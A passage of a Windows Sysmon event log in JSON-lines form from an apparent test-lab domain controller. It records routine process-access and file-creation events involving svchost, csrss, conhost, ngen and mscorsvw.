\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6874,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6875,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6876,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-221D-5F25-0000-001072FD0A00}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.804","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-221D-5F25-0000-001072FD0A00}","TargetProcessId":"2740","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6877,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:58.523\r\nProcessGuid: {41C8662E-221B-5F25-0000-00103DF20A00}\r\nProcessId: 4504\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1198-0\\PresentationFramework.dll\r\nCreationUtcTime: 2020-08-01 08:04:58.523","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:58.523","ProcessGuid":"{41C8662E-221B-5F25-0000-00103DF20A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1198-0\\PresentationFramework.dll","CreationUtcTime":"2020-08-01 08:04:58.523","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6878,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:58.835\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222A-5F25-0000-0010B0020B00}\r\nTargetProcessId: 1180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:58.835","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222A-5F25-0000-0010B0020B00}","TargetProcessId":"1180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6879,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:58.835\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222A-5F25-0000-0010B0020B00}\r\nTargetProcessId: 1180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:58.835","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222A-5F25-0000-0010B0020B00}","TargetProcessId":"1180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6880,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:58.835\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222A-5F25-0000-0010B0020B00}\r\nTargetProcessId: 1180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:58.835","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222A-5F25-0000-0010B0020B00}","TargetProcessId":"1180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6881,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:58.898\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222A-5F25-0000-001055060B00}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:58.898","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222A-5F25-0000-001055060B00}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6882,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:58.898\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222A-5F25-0000-001055060B00}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:58.898","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222A-5F25-0000-001055060B00}","TargetProcessId":"4132","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
